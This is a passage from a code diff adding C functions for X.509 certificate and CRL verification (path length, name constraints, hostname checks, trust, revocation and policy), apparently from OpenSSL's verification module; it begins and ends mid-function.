+                ok = cb(0, ctx);
+                if (!ok)
+                    goto end;
+            }
+        }
+        /* Check pathlen if not self issued */
+        if ((i > 1) && !(x->ex_flags & EXFLAG_SI)
+            && (x->ex_pathlen != -1)
+            && (plen > (x->ex_pathlen + proxy_path_length + 1))) {
+            ctx->error = X509_V_ERR_PATH_LENGTH_EXCEEDED;
+            ctx->error_depth = i;
+            ctx->current_cert = x;
+            ok = cb(0, ctx);
+            if (!ok)
+                goto end;
+        }
+        /* Increment path length if not self issued */
+        if (!(x->ex_flags & EXFLAG_SI))
+            plen++;
+        /*
+         * If this certificate is a proxy certificate, the next certificate
+         * must be another proxy certificate or a EE certificate.  If not,
+         * the next certificate must be a CA certificate.
+         */
+        if (x->ex_flags & EXFLAG_PROXY) {
+            if (x->ex_pcpathlen != -1 && i > x->ex_pcpathlen) {
+                ctx->error = X509_V_ERR_PROXY_PATH_LENGTH_EXCEEDED;
+                ctx->error_depth = i;
+                ctx->current_cert = x;
+                ok = cb(0, ctx);
+                if (!ok)
+                    goto end;
+            }
+            proxy_path_length++;
+            must_be_ca = 0;
+        } else
+            must_be_ca = 1;
+    }
+    ok = 1;
+ end:
+    return ok;
+#endif
+}
+
+static int check_name_constraints(X509_STORE_CTX *ctx)
+{
+    X509 *x;
+    int i, j, rv;
+    /* Check name constraints for all certificates */
+    for (i = sk_X509_num(ctx->chain) - 1; i >= 0; i--) {
+        x = sk_X509_value(ctx->chain, i);
+        /* Ignore self issued certs unless last in chain */
+        if (i && (x->ex_flags & EXFLAG_SI))
+            continue;
+        /*
+         * Check against constraints for all certificates higher in chain
+         * including trust anchor. Trust anchor not strictly speaking needed
+         * but if it includes constraints it is to be assumed it expects them
+         * to be obeyed.
+         */
+        for (j = sk_X509_num(ctx->chain) - 1; j > i; j--) {
+            NAME_CONSTRAINTS *nc = sk_X509_value(ctx->chain, j)->nc;
+            if (nc) {
+                rv = NAME_CONSTRAINTS_check(x, nc);
+                if (rv != X509_V_OK) {
+                    ctx->error = rv;
+                    ctx->error_depth = i;
+                    ctx->current_cert = x;
+                    if (!ctx->verify_cb(0, ctx))
+                        return 0;
+                }
+            }
+        }
+    }
+    return 1;
+}
+
+static int check_id_error(X509_STORE_CTX *ctx, int errcode)
+{
+    ctx->error = errcode;
+    ctx->current_cert = ctx->cert;
+    ctx->error_depth = 0;
+    return ctx->verify_cb(0, ctx);
+}
+
+static int check_hosts(X509 *x, X509_VERIFY_PARAM_ID *id)
+{
+    int i;
+    int n = sk_OPENSSL_STRING_num(id->hosts);
+    char *name;
+
+    for (i = 0; i < n; ++i) {
+        name = sk_OPENSSL_STRING_value(id->hosts, i);
+        if (X509_check_host(x, name, 0, id->hostflags, &id->peername) > 0)
+            return 1;
+    }
+    return n == 0;
+}
+
+static int check_id(X509_STORE_CTX *ctx)
+{
+    X509_VERIFY_PARAM *vpm = ctx->param;
+    X509_VERIFY_PARAM_ID *id = vpm->id;
+    X509 *x = ctx->cert;
+    if (id->hosts && check_hosts(x, id) <= 0) {
+        if (!check_id_error(ctx, X509_V_ERR_HOSTNAME_MISMATCH))
+            return 0;
+    }
+    if (id->email && X509_check_email(x, id->email, id->emaillen, 0) <= 0) {
+        if (!check_id_error(ctx, X509_V_ERR_EMAIL_MISMATCH))
+            return 0;
+    }
+    if (id->ip && X509_check_ip(x, id->ip, id->iplen, 0) <= 0) {
+        if (!check_id_error(ctx, X509_V_ERR_IP_ADDRESS_MISMATCH))
+            return 0;
+    }
+    return 1;
+}
+
+static int check_trust(X509_STORE_CTX *ctx)
+{
+    int i, ok;
+    X509 *x = NULL;
+    int (*cb) (int xok, X509_STORE_CTX *xctx);
+    cb = ctx->verify_cb;
+    /* Check all trusted certificates in chain */
+    for (i = ctx->last_untrusted; i < sk_X509_num(ctx->chain); i++) {
+        x = sk_X509_value(ctx->chain, i);
+        ok = X509_check_trust(x, ctx->param->trust, 0);
+        /* If explicitly trusted return trusted */
+        if (ok == X509_TRUST_TRUSTED)
+            return X509_TRUST_TRUSTED;
+        /*
+         * If explicitly rejected notify callback and reject if not
+         * overridden.
+         */
+        if (ok == X509_TRUST_REJECTED) {
+            ctx->error_depth = i;
+            ctx->current_cert = x;
+            ctx->error = X509_V_ERR_CERT_REJECTED;
+            ok = cb(0, ctx);
+            if (!ok)
+                return X509_TRUST_REJECTED;
+        }
+    }
+    /*
+     * If we accept partial chains and have at least one trusted certificate
+     * return success.
+     */
+    if (ctx->param->flags & X509_V_FLAG_PARTIAL_CHAIN) {
+        X509 *mx;
+        if (ctx->last_untrusted < sk_X509_num(ctx->chain))
+            return X509_TRUST_TRUSTED;
+        x = sk_X509_value(ctx->chain, 0);
+        mx = lookup_cert_match(ctx, x);
+        if (mx) {
+            (void)sk_X509_set(ctx->chain, 0, mx);
+            X509_free(x);
+            ctx->last_untrusted = 0;
+            return X509_TRUST_TRUSTED;
+        }
+    }
+
+    /*
+     * If no trusted certs in chain at all return untrusted and allow
+     * standard (no issuer cert) etc errors to be indicated.
+     */
+    return X509_TRUST_UNTRUSTED;
+}
+
+static int check_revocation(X509_STORE_CTX *ctx)
+{
+    int i, last, ok;
+    if (!(ctx->param->flags & X509_V_FLAG_CRL_CHECK))
+        return 1;
+    if (ctx->param->flags & X509_V_FLAG_CRL_CHECK_ALL)
+        last = sk_X509_num(ctx->chain) - 1;
+    else {
+        /* If checking CRL paths this isn't the EE certificate */
+        if (ctx->parent)
+            return 1;
+        last = 0;
+    }
+    for (i = 0; i <= last; i++) {
+        ctx->error_depth = i;
+        ok = check_cert(ctx);
+        if (!ok)
+            return ok;
+    }
+    return 1;
+}
+
+static int check_cert(X509_STORE_CTX *ctx)
+{
+    X509_CRL *crl = NULL, *dcrl = NULL;
+    X509 *x;
+    int ok, cnum;
+    unsigned int last_reasons;
+    cnum = ctx->error_depth;
+    x = sk_X509_value(ctx->chain, cnum);
+    ctx->current_cert = x;
+    ctx->current_issuer = NULL;
+    ctx->current_crl_score = 0;
+    ctx->current_reasons = 0;
+    while (ctx->current_reasons != CRLDP_ALL_REASONS) {
+        last_reasons = ctx->current_reasons;
+        /* Try to retrieve relevant CRL */
+        if (ctx->get_crl)
+            ok = ctx->get_crl(ctx, &crl, x);
+        else
+            ok = get_crl_delta(ctx, &crl, &dcrl, x);
+        /*
+         * If error looking up CRL, nothing we can do except notify callback
+         */
+        if (!ok) {
+            ctx->error = X509_V_ERR_UNABLE_TO_GET_CRL;
+            ok = ctx->verify_cb(0, ctx);
+            goto err;
+        }
+        ctx->current_crl = crl;
+        ok = ctx->check_crl(ctx, crl);
+        if (!ok)
+            goto err;
+
+        if (dcrl) {
+            ok = ctx->check_crl(ctx, dcrl);
+            if (!ok)
+                goto err;
+            ok = ctx->cert_crl(ctx, dcrl, x);
+            if (!ok)
+                goto err;
+        } else
+            ok = 1;
+
+        /* Don't look in full CRL if delta reason is removefromCRL */
+        if (ok != 2) {
+            ok = ctx->cert_crl(ctx, crl, x);
+            if (!ok)
+                goto err;
+        }
+
+        X509_CRL_free(crl);
+        X509_CRL_free(dcrl);
+        crl = NULL;
+        dcrl = NULL;
+        /*
+         * If reasons not updated we wont get anywhere by another iteration,
+         * so exit loop.
+         */
+        if (last_reasons == ctx->current_reasons) {
+            ctx->error = X509_V_ERR_UNABLE_TO_GET_CRL;
+            ok = ctx->verify_cb(0, ctx);
+            goto err;
+        }
+    }
+ err:
+    X509_CRL_free(crl);
+    X509_CRL_free(dcrl);
+
+    ctx->current_crl = NULL;
+    return ok;
+
+}
+
+/* Check CRL times against values in X509_STORE_CTX */
+
+static int check_crl_time(X509_STORE_CTX *ctx, X509_CRL *crl, int notify)
+{
+    time_t *ptime;
+    int i;
+    if (notify)
+        ctx->current_crl = crl;
+    if (ctx->param->flags & X509_V_FLAG_USE_CHECK_TIME)
+        ptime = &ctx->param->check_time;
+    else
+        ptime = NULL;
+
+    i = X509_cmp_time(X509_CRL_get_lastUpdate(crl), ptime);
+    if (i == 0) {
+        if (!notify)
+            return 0;
+        ctx->error = X509_V_ERR_ERROR_IN_CRL_LAST_UPDATE_FIELD;
+        if (!ctx->verify_cb(0, ctx))
+            return 0;
+    }
+
+    if (i > 0) {
+        if (!notify)
+            return 0;
+        ctx->error = X509_V_ERR_CRL_NOT_YET_VALID;
+        if (!ctx->verify_cb(0, ctx))
+            return 0;
+    }
+
+    if (X509_CRL_get_nextUpdate(crl)) {
+        i = X509_cmp_time(X509_CRL_get_nextUpdate(crl), ptime);
+
+        if (i == 0) {
+            if (!notify)
+                return 0;
+            ctx->error = X509_V_ERR_ERROR_IN_CRL_NEXT_UPDATE_FIELD;
+            if (!ctx->verify_cb(0, ctx))
+                return 0;
+        }
+        /* Ignore expiry of base CRL is delta is valid */
+        if ((i < 0) && !(ctx->current_crl_score & CRL_SCORE_TIME_DELTA)) {
+            if (!notify)
+                return 0;
+            ctx->error = X509_V_ERR_CRL_HAS_EXPIRED;
+            if (!ctx->verify_cb(0, ctx))
+                return 0;
+        }
+    }
+
+    if (notify)
+        ctx->current_crl = NULL;
+
+    return 1;
+}
+
+static int get_crl_sk(X509_STORE_CTX *ctx, X509_CRL **pcrl, X509_CRL **pdcrl,
+                      X509 **pissuer, int *pscore, unsigned int *preasons,
+                      STACK_OF(X509_CRL) *crls)
+{
+    int i, crl_score, best_score = *pscore;
+    unsigned int reasons, best_reasons = 0;
+    X509 *x = ctx->current_cert;
+    X509_CRL *crl, *best_crl = NULL;
+    X509 *crl_issuer = NULL, *best_crl_issuer = NULL;
+
+    for (i = 0; i < sk_X509_CRL_num(crls); i++) {
+        crl = sk_X509_CRL_value(crls, i);
+        reasons = *preasons;
+        crl_score = get_crl_score(ctx, &crl_issuer, &reasons, crl, x);
+
+        if (crl_score > best_score) {
+            best_crl = crl;
+            best_crl_issuer = crl_issuer;
+            best_score = crl_score;
+            best_reasons = reasons;
+        }
+    }
+
+    if (best_crl) {
+        if (*pcrl)
+            X509_CRL_free(*pcrl);
+        *pcrl = best_crl;
+        *pissuer = best_crl_issuer;
+        *pscore = best_score;
+        *preasons = best_reasons;
+        CRYPTO_add(&best_crl->references, 1, CRYPTO_LOCK_X509_CRL);
+        if (*pdcrl) {
+            X509_CRL_free(*pdcrl);
+            *pdcrl = NULL;
+        }
+        get_delta_sk(ctx, pdcrl, pscore, best_crl, crls);
+    }
+
+    if (best_score >= CRL_SCORE_VALID)
+        return 1;
+
+    return 0;
+}
+
+/*
+ * Compare two CRL extensions for delta checking purposes. They should be
+ * both present or both absent. If both present all fields must be identical.
+ */
+
+static int crl_extension_match(X509_CRL *a, X509_CRL *b, int nid)
+{
+    ASN1_OCTET_STRING *exta, *extb;
+    int i;
+    i = X509_CRL_get_ext_by_NID(a, nid, -1);
+    if (i >= 0) {
+        /* Can't have multiple occurrences */
+        if (X509_CRL_get_ext_by_NID(a, nid, i) != -1)
+            return 0;
+        exta = X509_EXTENSION_get_data(X509_CRL_get_ext(a, i));
+    } else
+        exta = NULL;
+
+    i = X509_CRL_get_ext_by_NID(b, nid, -1);
+
+    if (i >= 0) {
+
+        if (X509_CRL_get_ext_by_NID(b, nid, i) != -1)
+            return 0;
+        extb = X509_EXTENSION_get_data(X509_CRL_get_ext(b, i));
+    } else
+        extb = NULL;
+
+    if (!exta && !extb)
+        return 1;
+
+    if (!exta || !extb)
+        return 0;
+
+    if (ASN1_OCTET_STRING_cmp(exta, extb))
+        return 0;
+
+    return 1;
+}
+
+/* See if a base and delta are compatible */
+
+static int check_delta_base(X509_CRL *delta, X509_CRL *base)
+{
+    /* Delta CRL must be a delta */
+    if (!delta->base_crl_number)
+        return 0;
+    /* Base must have a CRL number */
+    if (!base->crl_number)
+        return 0;
+    /* Issuer names must match */
+    if (X509_NAME_cmp(X509_CRL_get_issuer(base), X509_CRL_get_issuer(delta)))
+        return 0;
+    /* AKID and IDP must match */
+    if (!crl_extension_match(delta, base, NID_authority_key_identifier))
+        return 0;
+    if (!crl_extension_match(delta, base, NID_issuing_distribution_point))
+        return 0;
+    /* Delta CRL base number must not exceed Full CRL number. */
+    if (ASN1_INTEGER_cmp(delta->base_crl_number, base->crl_number) > 0)
+        return 0;
+    /* Delta CRL number must exceed full CRL number */
+    if (ASN1_INTEGER_cmp(delta->crl_number, base->crl_number) > 0)
+        return 1;
+    return 0;
+}
+
+/*
+ * For a given base CRL find a delta... maybe extend to delta scoring or
+ * retrieve a chain of deltas...
+ */
+
+static void get_delta_sk(X509_STORE_CTX *ctx, X509_CRL **dcrl, int *pscore,
+                         X509_CRL *base, STACK_OF(X509_CRL) *crls)
+{
+    X509_CRL *delta;
+    int i;
+    if (!(ctx->param->flags & X509_V_FLAG_USE_DELTAS))
+        return;
+    if (!((ctx->current_cert->ex_flags | base->flags) & EXFLAG_FRESHEST))
+        return;
+    for (i = 0; i < sk_X509_CRL_num(crls); i++) {
+        delta = sk_X509_CRL_value(crls, i);
+        if (check_delta_base(delta, base)) {
+            if (check_crl_time(ctx, delta, 0))
+                *pscore |= CRL_SCORE_TIME_DELTA;
+            CRYPTO_add(&delta->references, 1, CRYPTO_LOCK_X509_CRL);
+            *dcrl = delta;
+            return;
+        }
+    }
+    *dcrl = NULL;
+}
+
+/*
+ * For a given CRL return how suitable it is for the supplied certificate
+ * 'x'. The return value is a mask of several criteria. If the issuer is not
+ * the certificate issuer this is returned in *pissuer. The reasons mask is
+ * also used to determine if the CRL is suitable: if no new reasons the CRL
+ * is rejected, otherwise reasons is updated.
+ */
+
+static int get_crl_score(X509_STORE_CTX *ctx, X509 **pissuer,
+                         unsigned int *preasons, X509_CRL *crl, X509 *x)
+{
+
+    int crl_score = 0;
+    unsigned int tmp_reasons = *preasons, crl_reasons;
+
+    /* First see if we can reject CRL straight away */
+
+    /* Invalid IDP cannot be processed */
+    if (crl->idp_flags & IDP_INVALID)
+        return 0;
+    /* Reason codes or indirect CRLs need extended CRL support */
+    if (!(ctx->param->flags & X509_V_FLAG_EXTENDED_CRL_SUPPORT)) {
+        if (crl->idp_flags & (IDP_INDIRECT | IDP_REASONS))
+            return 0;
+    } else if (crl->idp_flags & IDP_REASONS) {
+        /* If no new reasons reject */
+        if (!(crl->idp_reasons & ~tmp_reasons))
+            return 0;
+    }
+    /* Don't process deltas at this stage */
+    else if (crl->base_crl_number)
+        return 0;
+    /* If issuer name doesn't match certificate need indirect CRL */
+    if (X509_NAME_cmp(X509_get_issuer_name(x), X509_CRL_get_issuer(crl))) {
+        if (!(crl->idp_flags & IDP_INDIRECT))
+            return 0;
+    } else
+        crl_score |= CRL_SCORE_ISSUER_NAME;
+
+    if (!(crl->flags & EXFLAG_CRITICAL))
+        crl_score |= CRL_SCORE_NOCRITICAL;
+
+    /* Check expiry */
+    if (check_crl_time(ctx, crl, 0))
+        crl_score |= CRL_SCORE_TIME;
+
+    /* Check authority key ID and locate certificate issuer */
+    crl_akid_check(ctx, crl, pissuer, &crl_score);
+
+    /* If we can't locate certificate issuer at this point forget it */
+
+    if (!(crl_score & CRL_SCORE_AKID))
+        return 0;
+
+    /* Check cert for matching CRL distribution points */
+
+    if (crl_crldp_check(x, crl, crl_score, &crl_reasons)) {
+        /* If no new reasons reject */
+        if (!(crl_reasons & ~tmp_reasons))
+            return 0;
+        tmp_reasons |= crl_reasons;
+        crl_score |= CRL_SCORE_SCOPE;
+    }
+
+    *preasons = tmp_reasons;
+
+    return crl_score;
+
+}
+
+static void crl_akid_check(X509_STORE_CTX *ctx, X509_CRL *crl,
+                           X509 **pissuer, int *pcrl_score)
+{
+    X509 *crl_issuer = NULL;
+    X509_NAME *cnm = X509_CRL_get_issuer(crl);
+    int cidx = ctx->error_depth;
+    int i;
+
+    if (cidx != sk_X509_num(ctx->chain) - 1)
+        cidx++;
+
+    crl_issuer = sk_X509_value(ctx->chain, cidx);
+
+    if (X509_check_akid(crl_issuer, crl->akid) == X509_V_OK) {
+        if (*pcrl_score & CRL_SCORE_ISSUER_NAME) {
+            *pcrl_score |= CRL_SCORE_AKID | CRL_SCORE_ISSUER_CERT;
+            *pissuer = crl_issuer;
+            return;
+        }
+    }
+
+    for (cidx++; cidx < sk_X509_num(ctx->chain); cidx++) {
+        crl_issuer = sk_X509_value(ctx->chain, cidx);
+        if (X509_NAME_cmp(X509_get_subject_name(crl_issuer), cnm))
+            continue;
+        if (X509_check_akid(crl_issuer, crl->akid) == X509_V_OK) {
+            *pcrl_score |= CRL_SCORE_AKID | CRL_SCORE_SAME_PATH;
+            *pissuer = crl_issuer;
+            return;
+        }
+    }
+
+    /* Anything else needs extended CRL support */
+
+    if (!(ctx->param->flags & X509_V_FLAG_EXTENDED_CRL_SUPPORT))
+        return;
+
+    /*
+     * Otherwise the CRL issuer is not on the path. Look for it in the set of
+     * untrusted certificates.
+     */
+    for (i = 0; i < sk_X509_num(ctx->untrusted); i++) {
+        crl_issuer = sk_X509_value(ctx->untrusted, i);
+        if (X509_NAME_cmp(X509_get_subject_name(crl_issuer), cnm))
+            continue;
+        if (X509_check_akid(crl_issuer, crl->akid) == X509_V_OK) {
+            *pissuer = crl_issuer;
+            *pcrl_score |= CRL_SCORE_AKID;
+            return;
+        }
+    }
+}
+
+/*
+ * Check the path of a CRL issuer certificate. This creates a new
+ * X509_STORE_CTX and populates it with most of the parameters from the
+ * parent. This could be optimised somewhat since a lot of path checking will
+ * be duplicated by the parent, but this will rarely be used in practice.
+ */
+
+static int check_crl_path(X509_STORE_CTX *ctx, X509 *x)
+{
+    X509_STORE_CTX crl_ctx;
+    int ret;
+    /* Don't allow recursive CRL path validation */
+    if (ctx->parent)
+        return 0;
+    if (!X509_STORE_CTX_init(&crl_ctx, ctx->ctx, x, ctx->untrusted))
+        return -1;
+
+    crl_ctx.crls = ctx->crls;
+    /* Copy verify params across */
+    X509_STORE_CTX_set0_param(&crl_ctx, ctx->param);
+
+    crl_ctx.parent = ctx;
+    crl_ctx.verify_cb = ctx->verify_cb;
+
+    /* Verify CRL issuer */
+    ret = X509_verify_cert(&crl_ctx);
+
+    if (ret <= 0)
+        goto err;
+
+    /* Check chain is acceptable */
+
+    ret = check_crl_chain(ctx, ctx->chain, crl_ctx.chain);
+ err:
+    X509_STORE_CTX_cleanup(&crl_ctx);
+    return ret;
+}
+
+/*
+ * RFC3280 says nothing about the relationship between CRL path and
+ * certificate path, which could lead to situations where a certificate could
+ * be revoked or validated by a CA not authorised to do so. RFC5280 is more
+ * strict and states that the two paths must end in the same trust anchor,
+ * though some discussions remain... until this is resolved we use the
+ * RFC5280 version
+ */
+
+static int check_crl_chain(X509_STORE_CTX *ctx,
+                           STACK_OF(X509) *cert_path,
+                           STACK_OF(X509) *crl_path)
+{
+    X509 *cert_ta, *crl_ta;
+    cert_ta = sk_X509_value(cert_path, sk_X509_num(cert_path) - 1);
+    crl_ta = sk_X509_value(crl_path, sk_X509_num(crl_path) - 1);
+    if (!X509_cmp(cert_ta, crl_ta))
+        return 1;
+    return 0;
+}
+
+/*-
+ * Check for match between two dist point names: three separate cases.
+ * 1. Both are relative names and compare X509_NAME types.
+ * 2. One full, one relative. Compare X509_NAME to GENERAL_NAMES.
+ * 3. Both are full names and compare two GENERAL_NAMES.
+ * 4. One is NULL: automatic match.
+ */
+
+static int idp_check_dp(DIST_POINT_NAME *a, DIST_POINT_NAME *b)
+{
+    X509_NAME *nm = NULL;
+    GENERAL_NAMES *gens = NULL;
+    GENERAL_NAME *gena, *genb;
+    int i, j;
+    if (!a || !b)
+        return 1;
+    if (a->type == 1) {
+        if (!a->dpname)
+            return 0;
+        /* Case 1: two X509_NAME */
+        if (b->type == 1) {
+            if (!b->dpname)
+                return 0;
+            if (!X509_NAME_cmp(a->dpname, b->dpname))
+                return 1;
+            else
+                return 0;
+        }
+        /* Case 2: set name and GENERAL_NAMES appropriately */
+        nm = a->dpname;
+        gens = b->name.fullname;
+    } else if (b->type == 1) {
+        if (!b->dpname)
+            return 0;
+        /* Case 2: set name and GENERAL_NAMES appropriately */
+        gens = a->name.fullname;
+        nm = b->dpname;
+    }
+
+    /* Handle case 2 with one GENERAL_NAMES and one X509_NAME */
+    if (nm) {
+        for (i = 0; i < sk_GENERAL_NAME_num(gens); i++) {
+            gena = sk_GENERAL_NAME_value(gens, i);
+            if (gena->type != GEN_DIRNAME)
+                continue;
+            if (!X509_NAME_cmp(nm, gena->d.directoryName))
+                return 1;
+        }
+        return 0;
+    }
+
+    /* Else case 3: two GENERAL_NAMES */
+
+    for (i = 0; i < sk_GENERAL_NAME_num(a->name.fullname); i++) {
+        gena = sk_GENERAL_NAME_value(a->name.fullname, i);
+        for (j = 0; j < sk_GENERAL_NAME_num(b->name.fullname); j++) {
+            genb = sk_GENERAL_NAME_value(b->name.fullname, j);
+            if (!GENERAL_NAME_cmp(gena, genb))
+                return 1;
+        }
+    }
+
+    return 0;
+
+}
+
+static int crldp_check_crlissuer(DIST_POINT *dp, X509_CRL *crl, int crl_score)
+{
+    int i;
+    X509_NAME *nm = X509_CRL_get_issuer(crl);
+    /* If no CRLissuer return is successful iff don't need a match */
+    if (!dp->CRLissuer)
+        return ! !(crl_score & CRL_SCORE_ISSUER_NAME);
+    for (i = 0; i < sk_GENERAL_NAME_num(dp->CRLissuer); i++) {
+        GENERAL_NAME *gen = sk_GENERAL_NAME_value(dp->CRLissuer, i);
+        if (gen->type != GEN_DIRNAME)
+            continue;
+        if (!X509_NAME_cmp(gen->d.directoryName, nm))
+            return 1;
+    }
+    return 0;
+}
+
+/* Check CRLDP and IDP */
+
+static int crl_crldp_check(X509 *x, X509_CRL *crl, int crl_score,
+                           unsigned int *preasons)
+{
+    int i;
+    if (crl->idp_flags & IDP_ONLYATTR)
+        return 0;
+    if (x->ex_flags & EXFLAG_CA) {
+        if (crl->idp_flags & IDP_ONLYUSER)
+            return 0;
+    } else {
+        if (crl->idp_flags & IDP_ONLYCA)
+            return 0;
+    }
+    *preasons = crl->idp_reasons;
+    for (i = 0; i < sk_DIST_POINT_num(x->crldp); i++) {
+        DIST_POINT *dp = sk_DIST_POINT_value(x->crldp, i);
+        if (crldp_check_crlissuer(dp, crl, crl_score)) {
+            if (!crl->idp || idp_check_dp(dp->distpoint, crl->idp->distpoint)) {
+                *preasons &= dp->dp_reasons;
+                return 1;
+            }
+        }
+    }
+    if ((!crl->idp || !crl->idp->distpoint)
+        && (crl_score & CRL_SCORE_ISSUER_NAME))
+        return 1;
+    return 0;
+}
+
+/*
+ * Retrieve CRL corresponding to current certificate. If deltas enabled try
+ * to find a delta CRL too
+ */
+
+static int get_crl_delta(X509_STORE_CTX *ctx,
+                         X509_CRL **pcrl, X509_CRL **pdcrl, X509 *x)
+{
+    int ok;
+    X509 *issuer = NULL;
+    int crl_score = 0;
+    unsigned int reasons;
+    X509_CRL *crl = NULL, *dcrl = NULL;
+    STACK_OF(X509_CRL) *skcrl;
+    X509_NAME *nm = X509_get_issuer_name(x);
+    reasons = ctx->current_reasons;
+    ok = get_crl_sk(ctx, &crl, &dcrl,
+                    &issuer, &crl_score, &reasons, ctx->crls);
+
+    if (ok)
+        goto done;
+
+    /* Lookup CRLs from store */
+
+    skcrl = ctx->lookup_crls(ctx, nm);
+
+    /* If no CRLs found and a near match from get_crl_sk use that */
+    if (!skcrl && crl)
+        goto done;
+
+    get_crl_sk(ctx, &crl, &dcrl, &issuer, &crl_score, &reasons, skcrl);
+
+    sk_X509_CRL_pop_free(skcrl, X509_CRL_free);
+
+ done:
+
+    /* If we got any kind of CRL use it and return success */
+    if (crl) {
+        ctx->current_issuer = issuer;
+        ctx->current_crl_score = crl_score;
+        ctx->current_reasons = reasons;
+        *pcrl = crl;
+        *pdcrl = dcrl;
+        return 1;
+    }
+
+    return 0;
+}
+
+/* Check CRL validity */
+static int check_crl(X509_STORE_CTX *ctx, X509_CRL *crl)
+{
+    X509 *issuer = NULL;
+    EVP_PKEY *ikey = NULL;
+    int ok = 0, chnum, cnum;
+    cnum = ctx->error_depth;
+    chnum = sk_X509_num(ctx->chain) - 1;
+    /* if we have an alternative CRL issuer cert use that */
+    if (ctx->current_issuer)
+        issuer = ctx->current_issuer;
+
+    /*
+     * Else find CRL issuer: if not last certificate then issuer is next
+     * certificate in chain.
+     */
+    else if (cnum < chnum)
+        issuer = sk_X509_value(ctx->chain, cnum + 1);
+    else {
+        issuer = sk_X509_value(ctx->chain, chnum);
+        /* If not self signed, can't check signature */
+        if (!ctx->check_issued(ctx, issuer, issuer)) {
+            ctx->error = X509_V_ERR_UNABLE_TO_GET_CRL_ISSUER;
+            ok = ctx->verify_cb(0, ctx);
+            if (!ok)
+                goto err;
+        }
+    }
+
+    if (issuer) {
+        /*
+         * Skip most tests for deltas because they have already been done
+         */
+        if (!crl->base_crl_number) {
+            /* Check for cRLSign bit if keyUsage present */
+            if ((issuer->ex_flags & EXFLAG_KUSAGE) &&
+                !(issuer->ex_kusage & KU_CRL_SIGN)) {
+                ctx->error = X509_V_ERR_KEYUSAGE_NO_CRL_SIGN;
+                ok = ctx->verify_cb(0, ctx);
+                if (!ok)
+                    goto err;
+            }
+
+            if (!(ctx->current_crl_score & CRL_SCORE_SCOPE)) {
+                ctx->error = X509_V_ERR_DIFFERENT_CRL_SCOPE;
+                ok = ctx->verify_cb(0, ctx);
+                if (!ok)
+                    goto err;
+            }
+
+            if (!(ctx->current_crl_score & CRL_SCORE_SAME_PATH)) {
+                if (check_crl_path(ctx, ctx->current_issuer) <= 0) {
+                    ctx->error = X509_V_ERR_CRL_PATH_VALIDATION_ERROR;
+                    ok = ctx->verify_cb(0, ctx);
+                    if (!ok)
+                        goto err;
+                }
+            }
+
+            if (crl->idp_flags & IDP_INVALID) {
+                ctx->error = X509_V_ERR_INVALID_EXTENSION;
+                ok = ctx->verify_cb(0, ctx);
+                if (!ok)
+                    goto err;
+            }
+
+        }
+
+        if (!(ctx->current_crl_score & CRL_SCORE_TIME)) {
+            ok = check_crl_time(ctx, crl, 1);
+            if (!ok)
+                goto err;
+        }
+
+        /* Attempt to get issuer certificate public key */
+        ikey = X509_get_pubkey(issuer);
+
+        if (!ikey) {
+            ctx->error = X509_V_ERR_UNABLE_TO_DECODE_ISSUER_PUBLIC_KEY;
+            ok = ctx->verify_cb(0, ctx);
+            if (!ok)
+                goto err;
+        } else {
+            int rv;
+            rv = X509_CRL_check_suiteb(crl, ikey, ctx->param->flags);
+            if (rv != X509_V_OK) {
+                ctx->error = rv;
+                ok = ctx->verify_cb(0, ctx);
+                if (!ok)
+                    goto err;
+            }
+            /* Verify CRL signature */
+            if (X509_CRL_verify(crl, ikey) <= 0) {
+                ctx->error = X509_V_ERR_CRL_SIGNATURE_FAILURE;
+                ok = ctx->verify_cb(0, ctx);
+                if (!ok)
+                    goto err;
+            }
+        }
+    }
+
+    ok = 1;
+
+ err:
+    EVP_PKEY_free(ikey);
+    return ok;
+}
+
+/* Check certificate against CRL */
+static int cert_crl(X509_STORE_CTX *ctx, X509_CRL *crl, X509 *x)
+{
+    int ok;
+    X509_REVOKED *rev;
+    /*
+     * The rules changed for this... previously if a CRL contained unhandled
+     * critical extensions it could still be used to indicate a certificate
+     * was revoked. This has since been changed since critical extension can
+     * change the meaning of CRL entries.
+     */
+    if (!(ctx->param->flags & X509_V_FLAG_IGNORE_CRITICAL)
+        && (crl->flags & EXFLAG_CRITICAL)) {
+        ctx->error = X509_V_ERR_UNHANDLED_CRITICAL_CRL_EXTENSION;
+        ok = ctx->verify_cb(0, ctx);
+        if (!ok)
+            return 0;
+    }
+    /*
+     * Look for serial number of certificate in CRL If found make sure reason
+     * is not removeFromCRL.
+     */
+    if (X509_CRL_get0_by_cert(crl, &rev, x)) {
+        if (rev->reason == CRL_REASON_REMOVE_FROM_CRL)
+            return 2;
+        ctx->error = X509_V_ERR_CERT_REVOKED;
+        ok = ctx->verify_cb(0, ctx);
+        if (!ok)
+            return 0;
+    }
+
+    return 1;
+}
+
+static int check_policy(X509_STORE_CTX *ctx)
+{
+    int ret;
+    if (ctx->parent)
+        return 1;
+    ret = X509_policy_check(&ctx->tree, &ctx->explicit_policy, ctx->chain,
+                            ctx->param->policies, ctx->param->flags);
+    if (ret == 0) {
+        X509err(X509_F_CHECK_POLICY, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    /* Invalid or inconsistent extensions */
+    if (ret == -1) {
+        /*
+         * Locate certificates with bad extensions and notify callback.
+         */
+        X509 *x;
+        int i;
+        for (i = 1; i < sk_X509_num(ctx->chain); i++) {
+            x = sk_X509_value(ctx->chain, i);
+            if (!(x->ex_flags & EXFLAG_INVALID_POLICY))
+                continue;
+            ctx->current_cert = x;
+            ctx->error = X509_V_ERR_INVALID_POLICY_EXTENSION;
+            if (!ctx->verify_cb(0, ctx))
+                return 0;
+        }
+        return 1;
+    }
+    if (ret == -2) {
+        ctx->current_cert = NULL;
+        ctx->error = X509_V_ERR_NO_EXPLICIT_POLICY;
+        return ctx->verify_cb(0, ctx);
+    }
+
+    if (ctx->param->flags & X509_V_FLAG_NOTIFY_POLICY) {
+        ctx->current_cert = NULL;
+        ctx->error = X509_V_OK;
+        if (!ctx->verify_cb(2, ctx))
+            return 0;
+    }
+
+    return 1;
+}
+
+static int check_cert_time(X509_STORE_CTX *ctx, X509 *x)
+{
+    time_t *ptime;
+    int i;
+
+    if (ctx->param->flags & X509_V_FLAG_USE_CHECK_TIME)
+        ptime = &ctx->param->check_time;
+    else
+        ptime = NULL;
+
+    i = X509_cmp_time(X509_get_notBefore(x), ptime);
+    if (i == 0) {
+        ctx->error = X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD;
+        ctx->current_cert = x;
+        if (!ctx->verify_cb(0, ctx))
+            return 0;
+    }
+
+    if (i > 0) {
+        ctx->error = X509_V_ERR_CERT_NOT_YET_VALID;
+        ctx->current_cert = x;
